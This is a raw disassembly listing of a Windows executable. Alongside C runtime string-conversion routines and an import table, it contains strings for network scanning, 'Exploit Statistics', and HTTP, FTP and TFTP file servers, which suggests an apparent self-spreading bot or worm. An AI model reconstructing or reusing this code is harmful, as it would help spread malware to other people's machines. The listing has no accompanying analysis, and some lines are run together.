push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4201A0 ; LCMapStringA
test eax, eax
jz short loc_41F8ED
test byte ptr [ebp+arg_4+1], 4
jz short loc_41F8C9
mov [ebp+var_1C], esi
cmp [ebp+arg_14], ebx
jz short loc_41F8ED
cmp [ebp+arg_14], esi
jge short loc_41F8BA
mov esi, [ebp+arg_14]
loc_41F8BA: ; CODE XREF: sub_41F6BA+1FB�j
push esi
push edi
push [ebp+arg_10]
call sub_414670
add esp, 0Ch
jmp short loc_41F8ED
; ---------------------------------------------------------------------------
loc_41F8C9: ; CODE XREF: sub_41F6BA+1EE�j
cmp [ebp+arg_14], ebx
jnz short loc_41F8D2
push ebx
push ebx
jmp short loc_41F8D8
; ---------------------------------------------------------------------------
loc_41F8D2: ; CODE XREF: sub_41F6BA+212�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_41F8D8: ; CODE XREF: sub_41F6BA+216�j
push esi
push edi
push 1
push [ebp+arg_18]
call ds:dword_4200D4 ; MultiByteToWideChar
mov [ebp+var_1C], eax
jmp short loc_41F8ED
; ---------------------------------------------------------------------------
loc_41F8EA: ; CODE XREF: sub_41F6BA+160�j
; sub_41F6BA+181�j
mov edi, [ebp+var_34]
loc_41F8ED: ; CODE XREF: sub_41F6BA+1C9�j
; sub_41F6BA+1E8�j ...
cmp [ebp+var_24], ebx
jz short loc_41F8F9
push edi
call sub_414A14
pop ecx
loc_41F8F9: ; CODE XREF: sub_41F6BA+236�j
cmp [ebp+var_20], ebx
jz short loc_41F907
push [ebp+var_2C]
call sub_414A14
pop ecx
loc_41F907: ; CODE XREF: sub_41F6BA+242�j
mov eax, [ebp+var_1C]
loc_41F90A: ; CODE XREF: sub_41F6BA+91�j
; sub_41F6BA+F5�j
lea esp, [ebp-40h]
call __SEH_epilog
retn
sub_41F6BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F913 proc near ; CODE XREF: sub_41F659+21�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
arg_8 = word ptr 10h
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_4], 0FFFFh
jz short loc_41F958
cmp [ebp+arg_4], 100h
jnb short loc_41F937
movzx eax, [ebp+arg_4]
mov ecx, off_42DEA4
mov ax, [ecx+eax*2]
jmp short loc_41F95F
; ---------------------------------------------------------------------------
loc_41F937: ; CODE XREF: sub_41F913+12�j
mov eax, [ebp+arg_0]
push dword ptr [eax+14h]
push dword ptr [eax+4]
lea eax, [ebp+var_4]
push eax
push 1
lea eax, [ebp+arg_4]
push eax
push 1
call sub_41F96A
add esp, 18h
test eax, eax
jnz short loc_41F95C
loc_41F958: ; CODE XREF: sub_41F913+A�j
xor eax, eax
jmp short loc_41F95F
; ---------------------------------------------------------------------------
loc_41F95C: ; CODE XREF: sub_41F913+43�j
mov eax, [ebp+var_4]
loc_41F95F: ; CODE XREF: sub_41F913+22�j
; sub_41F913+47�j
movzx ecx, [ebp+arg_8]
movzx eax, ax
and eax, ecx
leave
retn
sub_41F913 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F96A proc near ; CODE XREF: sub_41F913+39�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push 24h
push offset stru_429D98
call __SEH_prolog
xor esi, esi
xor edi, edi
inc edi
cmp dword_47C608, esi
jnz short loc_41F9B5
lea eax, [ebp+var_1C]
push eax
push edi
push offset dword_4290B0
push edi
call ds:dword_420154 ; GetStringTypeW
test eax, eax
jz short loc_41F9A0
mov dword_47C608, edi
jmp short loc_41F9B5
; ---------------------------------------------------------------------------
loc_41F9A0: ; CODE XREF: sub_41F96A+2C�j
call ds:dword_420008 ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_41F9B5
mov dword_47C608, 2
loc_41F9B5: ; CODE XREF: sub_41F96A+17�j
; sub_41F96A+34�j ...
mov eax, dword_47C608
cmp eax, edi
jnz short loc_41F9D5
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_420154 ; GetStringTypeW
jmp loc_41FB86
; ---------------------------------------------------------------------------
loc_41F9D5: ; CODE XREF: sub_41F96A+52�j
cmp eax, 2
jz short loc_41F9DE
cmp eax, esi
jnz short loc_41FA31
loc_41F9DE: ; CODE XREF: sub_41F96A+6E�j
mov [ebp+var_20], esi
mov [ebp+var_24], esi
cmp [ebp+arg_14], esi
jnz short loc_41F9F1
mov eax, dword_47C4C0
mov [ebp+arg_14], eax
loc_41F9F1: ; CODE XREF: sub_41F96A+7D�j
cmp [ebp+arg_10], esi
jnz short loc_41F9FE
mov eax, dword_47C4D0
mov [ebp+arg_10], eax
loc_41F9FE: ; CODE XREF: sub_41F96A+8A�j
push [ebp+arg_14]
call sub_41DF57
pop ecx
cmp [ebp+arg_10], eax
jz short loc_41FA14
cmp eax, 0FFFFFFFFh
jz short loc_41FA14
mov [ebp+arg_10], eax
loc_41FA14: ; CODE XREF: sub_41F96A+A0�j
; sub_41F96A+A5�j
push esi
push esi
push esi
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push esi
push [ebp+arg_10]
call ds:dword_4200D8 ; WideCharToMultiByte
mov ebx, eax
mov [ebp+var_28], ebx
cmp ebx, esi
jnz short loc_41FA38
loc_41FA31: ; CODE XREF: sub_41F96A+72�j
; sub_41F96A+126�j
xor eax, eax
jmp loc_41FB86
; ---------------------------------------------------------------------------
loc_41FA38: ; CODE XREF: sub_41F96A+C5�j
mov [ebp+ms_exc.disabled], esi
mov eax, ebx
add eax, 3
and eax, 0FFFFFFFCh
call sub_414800
mov [ebp+ms_exc.old_esp], esp
mov eax, esp
mov [ebp+var_2C], eax
push ebx
push esi
push eax
call sub_41C550
add esp, 0Ch
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_41FA7D
; ---------------------------------------------------------------------------
loc_41FA61: ; DATA XREF: .rdata:stru_429D98�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41FA65: ; DATA XREF: .rdata:stru_429D98�o
mov esp, [ebp+ms_exc.old_esp]
call sub_419D38
and [ebp+var_2C], 0
or [ebp+ms_exc.disabled], 0FFFFFFFFh
xor edi, edi
inc edi
mov ebx, [ebp+var_28]
xor esi, esi
loc_41FA7D: ; CODE XREF: sub_41F96A+F5�j
cmp [ebp+var_2C], esi
jnz short loc_41FA95
push ebx
push edi
call sub_41C280
pop ecx
pop ecx
mov [ebp+var_2C], eax
cmp eax, esi
jz short loc_41FA31
mov [ebp+var_20], edi
loc_41FA95: ; CODE XREF: sub_41F96A+116�j
push esi
push esi
push ebx
push [ebp+var_2C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
push [ebp+arg_10]
call ds:dword_4200D8 ; WideCharToMultiByte
test eax, eax
jz loc_41FB75
mov [ebp+ms_exc.disabled], edi
lea eax, [ebx+ebx+2]
add eax, 3
and eax, 0FFFFFFFCh
call sub_414800
mov [ebp+ms_exc.old_esp], esp
mov eax, esp
mov [ebp+var_30], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_41FAEF
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
call sub_419D38
and [ebp+var_30], 0
or [ebp+ms_exc.disabled], 0FFFFFFFFh
xor edi, edi
inc edi
mov ebx, [ebp+var_28]
xor esi, esi
loc_41FAEF: ; CODE XREF: sub_41F96A+167�j
cmp [ebp+var_30], esi
jnz short loc_41FB09
lea eax, [ebx+ebx+2]
push eax
call sub_414E7D
pop ecx
mov [ebp+var_30], eax
cmp eax, esi
jz short loc_41FB75
mov [ebp+var_24], edi
loc_41FB09: ; CODE XREF: sub_41F96A+188�j
cmp [ebp+arg_14], esi
jnz short loc_41FB16
mov eax, dword_47C4C0
mov [ebp+arg_14], eax
loc_41FB16: ; CODE XREF: sub_41F96A+1A2�j
mov edi, [ebp+arg_8]
add edi, edi
mov eax, [ebp+var_30]
lea esi, [edi+eax]
or word ptr [esi], 0FFFFh
or word ptr [esi-2], 0FFFFh
push eax
push ebx
push [ebp+var_2C]
push [ebp+arg_0]
push [ebp+arg_14]
call ds:dword_4201D4 ; GetStringTypeA
mov [ebp+var_34], eax
cmp word ptr [esi-2], 0FFFFh
jz short loc_41FB60
cmp word ptr [esi], 0FFFFh
jnz short loc_41FB60
push edi
push [ebp+var_30]
push [ebp+arg_C]
call sub_41D220
add esp, 0Ch
jmp short loc_41FB64
; ---------------------------------------------------------------------------
loc_41FB60: ; CODE XREF: sub_41F96A+1DC�j
; sub_41F96A+1E3�j
and [ebp+var_34], 0
loc_41FB64: ; CODE XREF: sub_41F96A+1F4�j
cmp [ebp+var_24], 0
jz short loc_41FB73
push [ebp+var_30]
call sub_414A14
pop ecx
loc_41FB73: ; CODE XREF: sub_41F96A+1FE�j
xor esi, esi
loc_41FB75: ; CODE XREF: sub_41F96A+143�j
; sub_41F96A+19A�j
cmp [ebp+var_20], esi
jz short loc_41FB83
push [ebp+var_2C]
call sub_414A14
pop ecx
loc_41FB83: ; CODE XREF: sub_41F96A+20E�j
mov eax, [ebp+var_34]
loc_41FB86: ; CODE XREF: sub_41F96A+66�j
; sub_41F96A+C9�j
lea esp, [ebp-40h]
call __SEH_epilog
retn
sub_41F96A endp
; ---------------------------------------------------------------------------
mov eax, dword_435C08
and eax, 0FFFFFFFEh
mov dword_435C08, eax
retn
; ---------------------------------------------------------------------------
loc_41FB9D: ; DATA XREF: sub_407064�o
mov eax, offset dword_429DC8
jmp loc_415695
_text ends
; Section 2. (virtual address 00020000)
; Virtual size : 0000A8B8 ( 43192.)
; Section size in file : 0000A8B8 ( 43192.)
; Offset to raw data for section: 00020000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_rdata segment para public 'CODE' use32
assume cs:_rdata
;org 420000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
dword_420000 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_401141+28B�r ...
dword_420004 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCount ; sub_401967+32�r ...
dword_420008 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Error ; sub_401141+278�r ...
dword_42000C dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_401141+25B�r ...
dword_420010 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameA ; sub_401141+183�r ...
dword_420014 dd 7C80C058h ; resolved to->KERNEL32.ExitThread ; sub_401B9D+24B�r ...
dword_420018 dd 7C9010EDh ; resolved to->NTDLL.RtlLeaveCriticalSection ; sub_41804A+28�r ...
dword_42001C dd 7C901005h ; resolved to->NTDLL.RtlEnterCriticalSection ; sub_417FF8+28�r ...
dword_420020 dd 7C80B829h ; resolved to->KERNEL32.InitializeCriticalSectionAndSpinCountdword_420024 dd 7C91188Ah ; resolved to->NTDLL.RtlDeleteCriticalSection ; sub_401B9D+23B�r ...
dword_420028 dd 7C80A7D4h ; resolved to->KERNEL32.GetLocalTimedword_42002C dd 7C80A427h ; resolved to->KERNEL32.QueryPerformanceCounter ; sub_4021B5+2C6�r ...
dword_420030 dd 7C82FA46h ; resolved to->KERNEL32.QueryPerformanceFrequency ; sub_41126C+F8�r
dword_420034 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_402E99+D9�r ...
dword_420038 dd 7C802367h ; resolved to->KERNEL32.CreateProcessA ; sub_40260A+485�r ...
dword_42003C dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_402E99+B2�r ...
dword_420040 dd 7C810D87h ; resolved to->KERNEL32.WriteFile ; sub_406A33+AF�r ...
dword_420044 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_4048D6+26�r ...
dword_420048 dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_408A18+433B�r ...
dword_42004C dd 7C80EDD7h ; resolved to->KERNEL32.FindClose ; sub_402F79+144�r ...
dword_420050 dd 7C834EB1h ; resolved to->KERNEL32.FindNextFileA ; sub_402F79+139�r ...
dword_420054 dd 7C8137D9h ; resolved to->KERNEL32.FindFirstFileA ; sub_4041E2+231�r
dword_420058 dd 7C91043Dh ; resolved to->NTDLL.RtlFreeHeap ; sub_4031EB+F5�r ...
dword_42005C dd 7C9105D4h ; resolved to->NTDLL.RtlAllocateHeap ; sub_403374+4A�r ...
dword_420060 dd 7C80ABC1h ; resolved to->KERNEL32.GetProcessHeap ; sub_403374+40�r ...
dword_420064 dd 7C80E7ECh ; resolved to->KERNEL32.FileTimeToSystemTime ; sub_4041E2+2AB�r
dword_420068 dd 7C80E866h ; resolved to->KERNEL32.FileTimeToLocalFileTime ; sub_4041E2+29D�r
dword_42006C dd 7C80B9A0h ; resolved to->KERNEL32.VirtualQueryEx ; sub_403512+53�r
dword_420070 dd 7C8021CCh ; resolved to->KERNEL32.ReadProcessMemory ; sub_403512+8D�r
dword_420074 dd 7C812D56h ; resolved to->KERNEL32.GetSystemInfo ; sub_403512+2C�r ...
dword_420078 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcess ; sub_403512+10�r ...
dword_42007C dd 7C80ABDEh ; resolved to->KERNEL32.FreeLibrarydword_420080 dd 7C80F0F4h ; resolved to->KERNEL32.GetEnvironmentVariableWdword_420084 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_4057AC+11�r ...
dword_420088 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_4057AC+13A�r ...
dword_42008C dd 7C80180Eh ; resolved to->KERNEL32.ReadFile ; sub_40F18F+B9�r ...
dword_420090 dd 7C810B8Eh ; resolved to->KERNEL32.SetFilePointer ; sub_41B348+2D�r ...
dword_420094 dd 7C810A77h ; resolved to->KERNEL32.GetFileSize ; sub_404C6A+1F6�r
dword_420098 dd 7C83632Dh ; resolved to->KERNEL32.GetTimeFormatA ; sub_41175C+185�r
dword_42009C dd 7C8361EEh ; resolved to->KERNEL32.GetDateFormatA ; sub_41175C+16E�r
dword_4200A0 dd 7C81153Ch ; resolved to->KERNEL32.GetFileAttributesA ; sub_406A33+10A�r ...
dword_4200A4 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; sub_406A33+F6�r ...
dword_4200A8 dd 7C82F7A0h ; resolved to->KERNEL32.FormatMessageAdword_4200AC dd 7C80FE82h ; resolved to->KERNEL32.GlobalUnlockdword_4200B0 dd 7C80FF19h ; resolved to->KERNEL32.GlobalLockdword_4200B4 dd 7C80B974h ; resolved to->KERNEL32.UnmapViewOfFiledword_4200B8 dd 7C80B905h ; resolved to->KERNEL32.MapViewOfFiledword_4200BC dd 7C80945Ch ; resolved to->KERNEL32.CreateFileMappingAdword_4200C0 dd 7C831CB8h ; resolved to->KERNEL32.SetFileTimedword_4200C4 dd 7C831C45h ; resolved to->KERNEL32.GetFileTimedword_4200C8 dd 7C8329D9h ; resolved to->KERNEL32.ExpandEnvironmentStringsAdword_4200CC dd 7C812782h ; resolved to->KERNEL32.SetFileAttributesA ; sub_408206+293�r ...
dword_4200D0 dd 7C835DCAh ; resolved to->KERNEL32.GetTempPathA ; sub_408A18+2FE4�r
dword_4200D4 dd 7C809BF8h ; resolved to->KERNEL32.MultiByteToWideChar ; sub_413FFD+84�r ...
dword_4200D8 dd 7C80A0D4h ; resolved to->KERNEL32.WideCharToMultiByte ; .text:004143F0�r ...
dword_4200DC dd 7C8216A4h ; resolved to->KERNEL32.GetComputerNameA ; .text:0040FABA�r
dword_4200E0 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcess ; sub_40F31C+7D�r ...
dword_4200E4 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_408A18+3947�r ...
dword_4200E8 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcess ; sub_408206+24B�r ...
dword_4200EC dd 7C80BAA1h ; resolved to->KERNEL32.lstrcmpiAdword_4200F0 dd 7C81CE03h ; resolved to->KERNEL32.TerminateThread ; sub_41094B+A3�r ...
dword_4200F4 dd 7C835E8Fh ; resolved to->KERNEL32.MoveFileAdword_4200F8 dd 7C809920h ; resolved to->KERNEL32.GetCurrentProcessId ; sub_41E16F+17�r
dword_4200FC dd 7C8286EEh ; resolved to->KERNEL32.CopyFileA ; sub_413FFD+AC�r
dword_420100 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObject ; sub_40E745+307�r
dword_420104 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_420108 dd 7C81AE17h ; resolved to->KERNEL32.GetExitCodeProcessdword_42010C dd 7C85F90Fh ; resolved to->KERNEL32.PeekNamedPipe ; sub_40F18F+101�r
dword_420110 dd 7C80DDFEh ; resolved to->KERNEL32.DuplicateHandle ; sub_4105D1+6B�r
dword_420114 dd 7C81E0C7h ; resolved to->KERNEL32.CreatePipe ; sub_41084F+48�r ...
dword_420118 dd 7C81B58Bh ; resolved to->KERNEL32.SetConsoleCtrlHandlerdword_42011C dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoA ; sub_41DF57+23�r
dword_420120 dd 7C812ADEh ; resolved to->KERNEL32.GetVersionExA ; sub_41162E+19�r ...
dword_420124 dd 7C830B14h ; resolved to->KERNEL32.GetLogicalDrivesdword_420128 dd 7C873A31h ; resolved to->KERNEL32.GenerateConsoleCtrlEventdword_42012C dd 7C80A05Dh ; resolved to->KERNEL32.WaitForMultipleObjectsdword_420130 dd 7C8310F2h ; resolved to->KERNEL32.GlobalMemoryStatusdword_420134 dd 7C832044h ; resolved to->KERNEL32.SetEndOfFiledword_420138 dd 7C9109EDh ; resolved to->NTDLL.RtlSizeHeapdword_42013C dd 7C80BCCFh ; resolved to->KERNEL32.IsBadCodePtrdword_420140 dd 7C809E01h ; resolved to->KERNEL32.IsBadReadPtrdword_420144 dd 7C84467Dh ; resolved to->KERNEL32.SetUnhandledExceptionFilter ; sub_41E368+6�r
dword_420148 dd 7C809EF1h ; resolved to->KERNEL32.InitializeCriticalSectiondword_42014C dd 7C812641h ; resolved to->KERNEL32.FlushFileBuffersdword_420150 dd 7C81DC03h ; resolved to->KERNEL32.SetStdHandle ; sub_41CC9C:loc_41CCF2�r
dword_420154 dd 7C80A490h ; resolved to->KERNEL32.GetStringTypeW ; sub_41C5B0+128�r ...
dword_420158 dd 7C9179FDh ; resolved to->NTDLL.RtlReAllocateHeap ; sub_414BBA+188�r ...
dword_42015C dd 7C8017E5h ; resolved to->KERNEL32.GetSystemTimeAsFileTime ; sub_41E16F+B�r
dword_420160 dd 7C937A40h ; resolved to->NTDLL.RtlUnwinddword_420164 dd 7C801EEEh ; resolved to->KERNEL32.GetStartupInfoA ; sub_41BD3D+5D�r
dword_420168 dd 7C812F1Dh ; resolved to->KERNEL32.GetCommandLineAdword_42016C dd 7C8136D7h ; resolved to->KERNEL32.TlsFreedword_420170 dd 7C910340h ; resolved to->NTDLL.RtlSetLastWin32Error ; sub_41D188+79�r
dword_420174 dd 7C809728h ; resolved to->KERNEL32.GetCurrentThreadId ; sub_416E86+55�r ...
dword_420178 dd 7C809BC5h ; resolved to->KERNEL32.TlsSetValue ; sub_416E86+3D�r
dword_42017C dd 7C809740h ; resolved to->KERNEL32.TlsGetValuedword_420180 dd 7C812D9Fh ; resolved to->KERNEL32.TlsAllocdword_420184 dd 7C810EF8h ; resolved to->KERNEL32.HeapDestroydword_420188 dd 7C812BB6h ; resolved to->KERNEL32.HeapCreatedword_42018C dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_420190 dd 7C809A51h ; resolved to->KERNEL32.VirtualAlloc ; sub_4186F8+52�r ...
dword_420194 dd 7C809E79h ; resolved to->KERNEL32.IsBadWritePtrdword_420198 dd 7C801AD0h ; resolved to->KERNEL32.VirtualProtectdword_42019C dd 7C80B9D1h ; resolved to->KERNEL32.VirtualQuery ; sub_419D38+71�r
dword_4201A0 dd 7C838DE8h ; resolved to->KERNEL32.LCMapStringA ; sub_419E09+344�r ...
dword_4201A4 dd 7C80CCA8h ; resolved to->KERNEL32.LCMapStringW ; sub_419E09+15B�r ...
dword_4201A8 dd 7C809915h ; resolved to->KERNEL32.GetACPdword_4201AC dd 7C8127A7h ; resolved to->KERNEL32.GetOEMCPdword_4201B0 dd 7C812E76h ; resolved to->KERNEL32.GetCPInfo ; sub_41AE37+3D�r ...
dword_4201B4 dd 7C812F39h ; resolved to->KERNEL32.GetStdHandle ; sub_41BD3D+188�r
dword_4201B8 dd 7C862E2Ah ; resolved to->KERNEL32.UnhandledExceptionFilterdword_4201BC dd 7C81DF77h ; resolved to->KERNEL32.FreeEnvironmentStringsAdword_4201C0 dd 7C81CF5Bh ; resolved to->KERNEL32.GetEnvironmentStringsAdword_4201C4 dd 7C814AE7h ; resolved to->KERNEL32.FreeEnvironmentStringsWdword_4201C8 dd 7C812F08h ; resolved to->KERNEL32.GetEnvironmentStringsWdword_4201CC dd 7C80CC97h ; resolved to->KERNEL32.SetHandleCountdword_4201D0 dd 7C810E51h ; resolved to->KERNEL32.GetFileType ; sub_41BD3D+196�r ...
dword_4201D4 dd 7C838A0Ch ; resolved to->KERNEL32.GetStringTypeA ; sub_41F96A+1CD�r
dd 0
dword_4201DC dd 80000015h dword_4201E0 dd 8000000Ah dword_4201E4 dd 80000002h dword_4201E8 dd 8000000Dh dword_4201EC dd 80000012h ; sub_403C3B+58B�r
dword_4201F0 dd 80000097h dword_4201F4 dd 80000001h dword_4201F8 dd 80000010h dword_4201FC dd 80000013h ; sub_403C3B+119�r
dword_420200 dd 80000073h ; sub_403C3B+49�r
dword_420204 dd 80000017h ; sub_403C3B+6F�r
dword_420208 dd 8000000Bh dword_42020C dd 80000009h ; sub_403C3B+B0�r
dword_420210 dd 80000004h dword_420214 dd 80000003h ; sub_403BA9+80�r ...
dword_420218 dd 80000074h ; sub_403BA9+86�r
align 10h
aTotalDInS_ db ' Total: %d in %s.',0 ; DATA XREF: sub_401000+81�o
align 4
aSD db ' %s: %d,',0 ; DATA XREF: sub_401000+42�o
align 10h
aScanExploitSta db '[SCAN]: Exploit Statistics:',0 ; DATA XREF: sub_401000+11�o
aScanScanNotAct db '[SCAN]: Scan not active.',0 ; DATA XREF: sub_4010CA+42�o
align 4
aScanCurrentIpS db '[SCAN]: Current IP: %s.',0 ; DATA XREF: sub_4010CA+2C�o
aHttpdFailedToS db '[HTTPD]: Failed to start server, error: <%d>.',0
; DATA XREF: sub_401141+38D�o
align 10h
aHttpdServerLis db '[HTTPD]: Server listening on IP: %s:%d, Directory: %s\.',0
; DATA XREF: sub_401141+337�o
; sub_408A18+43DF�o
aFtpFailedToSta db '[FTP]: Failed to start server, error: <%d>.',0
; DATA XREF: sub_401141+27F�o
aFtpServerStart db '[FTP]: Server started on: %s:%d, File: %s, Request: %s.',0
; DATA XREF: sub_401141+228�o
aTftpFailedToSt db '[TFTP]: Failed to start server, error: <%d>.',0
; DATA XREF: sub_401141+13B�o
align 4
aTftpServerStar db '[TFTP]: Server started on Port: %d, File: %s, Request: %s.',0
; DATA XREF: sub_401141+DB�o
; sub_408A18+424F�o
align 4
aD_D_D_D db '%d.%d.%d.%d',0 ; DATA XREF: sub_4017F1+42�o
; sub_407D51+3D�o
aScanIpSPortDIs db '[SCAN]: IP: %s, Port %d is open.',0 ; DATA XREF: sub_401967+DC�o
align 4
aScanIpSDScanTh db '[SCAN]: IP: %s:%d, Scan thread: %d, Sub-thread: %d.',0
; DATA XREF: sub_401967+84�o
aScanFinishedAt db '[SCAN]: Finished at %s:%d after %d minute(s) of scanning.',0
; DATA XREF: sub_401B9D+1E0�o
align 4
aScanFailedToSt db '[SCAN]: Failed to start worker thread, error: <%d>.',0
; DATA XREF: sub_401B9D+16E�o
aScanSDScanThre db '[SCAN]: %s:%d, Scan thread: %d, Sub-thread: %d.',0
; DATA XREF: sub_401B9D+10F�o
aScanFailedToIn db '[SCAN]: Failed to initialize critical section.',0
; DATA XREF: sub_401B9D+A0�o
align 4
aD_SS db '%d. %s = %s',0 ; DATA XREF: sub_401E87+35�o
aAliasList db '-[Alias List]-',0 ; DATA XREF: sub_401E87+10�o
align 4
a_2d_2d4d_2d_2d db '[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s',0 ; DATA XREF: sub_401EFF+60�o
align 4
aLogsCleared_ db '[LOGS]: Cleared.',0 ; DATA XREF: sub_401F9F+1A�o
align 10h
aLogListComplet db '[LOG]: List complete.',0 ; DATA XREF: sub_402011+DC�o
align 4
aLogBegin db '[LOG]: Begin',0 ; DATA XREF: sub_402011+3F�o
align 4
dd 0
dd 77073096h, 0EE0E612Ch, 990951BAh, 76DC419h, 706AF48Fh
dd 0E963A535h, 9E6495A3h, 0EDB8832h, 79DCB8A4h, 0E0D5E91Eh
dd 97D2D988h, 9B64C2Bh, 7EB17CBDh, 0E7B82D07h, 90BF1D91h
dd 1DB71064h, 6AB020F2h, 0F3B97148h, 84BE41DEh, 1ADAD47Dh
dd 6DDDE4EBh, 0F4D4B551h, 83D385C7h, 136C9856h, 646BA8C0h
dd 0FD62F97Ah, 8A65C9ECh, 14015C4Fh, 63066CD9h, 0FA0F3D63h
dd 8D080DF5h, 3B6E20C8h, 4C69105Eh, 0D56041E4h, 0A2677172h
dd 3C03E4D1h, 4B04D447h, 0D20D85FDh, 0A50AB56Bh, 35B5A8FAh
dd 42B2986Ch, 0DBBBC9D6h, 0ACBCF940h, 32D86CE3h, 45DF5C75h
dd 0DCD60DCFh, 0ABD13D59h, 26D930ACh, 51DE003Ah, 0C8D75180h
dd 0BFD06116h, 21B4F4B5h, 56B3C423h, 0CFBA9599h, 0B8BDA50Fh
dd 2802B89Eh, 5F058808h, 0C60CD9B2h, 0B10BE924h, 2F6F7C87h
dd 58684C11h, 0C1611DABh, 0B6662D3Dh, 76DC4190h, 1DB7106h
dd 98D220BCh, 0EFD5102Ah, 71B18589h, 6B6B51Fh, 9FBFE4A5h
dd 0E8B8D433h, 7807C9A2h, 0F00F934h, 9609A88Eh, 0E10E9818h
dd 7F6A0DBBh, 86D3D2Dh, 91646C97h, 0E6635C01h, 6B6B51F4h
dd 1C6C6162h, 856530D8h, 0F262004Eh, 6C0695EDh, 1B01A57Bh
dd 8208F4C1h, 0F50FC457h, 65B0D9C6h, 12B7E950h, 8BBEB8EAh
dd 0FCB9887Ch, 62DD1DDFh, 15DA2D49h, 8CD37CF3h, 0FBD44C65h
dd 4DB26158h, 3AB551CEh, 0A3BC0074h, 0D4BB30E2h, 4ADFA541h
dd 3DD895D7h, 0A4D1C46Dh, 0D3D6F4FBh, 4369E96Ah, 346ED9FCh
dd 0AD678846h, 0DA60B8D0h, 44042D73h, 33031DE5h, 0AA0A4C5Fh
dd 0DD0D7CC9h, 5005713Ch, 270241AAh, 0BE0B1010h, 0C90C2086h
dd 5768B525h, 206F85B3h, 0B966D409h, 0CE61E49Fh, 5EDEF90Eh
dd 29D9C998h, 0B0D09822h, 0C7D7A8B4h, 59B33D17h, 2EB40D81h
dd 0B7BD5C3Bh, 0C0BA6CADh, 0EDB88320h, 9ABFB3B6h, 3B6E20Ch
dd 74B1D29Ah, 0EAD54739h, 9DD277AFh, 4DB2615h, 73DC1683h
dd 0E3630B12h, 94643B84h, 0D6D6A3Eh, 7A6A5AA8h, 0E40ECF0Bh
dd 9309FF9Dh, 0A00AE27h, 7D079EB1h, 0F00F9344h, 8708A3D2h
dd 1E01F268h, 6906C2FEh, 0F762575Dh, 806567CBh, 196C3671h
dd 6E6B06E7h, 0FED41B76h, 89D32BE0h, 10DA7A5Ah, 67DD4ACCh
dd 0F9B9DF6Fh, 8EBEEFF9h, 17B7BE43h, 60B08ED5h, 0D6D6A3E8h
dd 0A1D1937Eh, 38D8C2C4h, 4FDFF252h, 0D1BB67F1h, 0A6BC5767h
dd 3FB506DDh, 48B2364Bh, 0D80D2BDAh, 0AF0A1B4Ch, 36034AF6h
dd 41047A60h, 0DF60EFC3h, 0A867DF55h, 316E8EEFh, 4669BE79h
dd 0CB61B38Ch, 0BC66831Ah, 256FD2A0h, 5268E236h, 0CC0C7795h
dd 0BB0B4703h, 220216B9h, 5505262Fh, 0C5BA3BBEh, 0B2BD0B28h
dd 2BB45A92h, 5CB36A04h, 0C2D7FFA7h, 0B5D0CF31h, 2CD99E8Bh
dd 5BDEAE1Dh, 9B64C2B0h, 0EC63F226h, 756AA39Ch, 26D930Ah
dd 9C0906A9h, 0EB0E363Fh, 72076785h, 5005713h, 95BF4A82h
dd 0E2B87A14h, 7BB12BAEh, 0CB61B38h, 92D28E9Bh, 0E5D5BE0Dh
dd 7CDCEFB7h, 0BDBDF21h, 86D3D2D4h, 0F1D4E242h, 68DDB3F8h
dd 1FDA836Eh, 81BE16CDh, 0F6B9265Bh, 6FB077E1h, 18B74777h
dd 88085AE6h, 0FF0F6A70h, 66063BCAh, 11010B5Ch, 8F659EFFh
dd 0F862AE69h, 616BFFD3h, 166CCF45h, 0A00AE278h, 0D70DD2EEh
dd 4E048354h, 3903B3C2h, 0A7672661h, 0D06016F7h, 4969474Dh
dd 3E6E77DBh, 0AED16A4Ah, 0D9D65ADCh, 40DF0B66h, 37D83BF0h
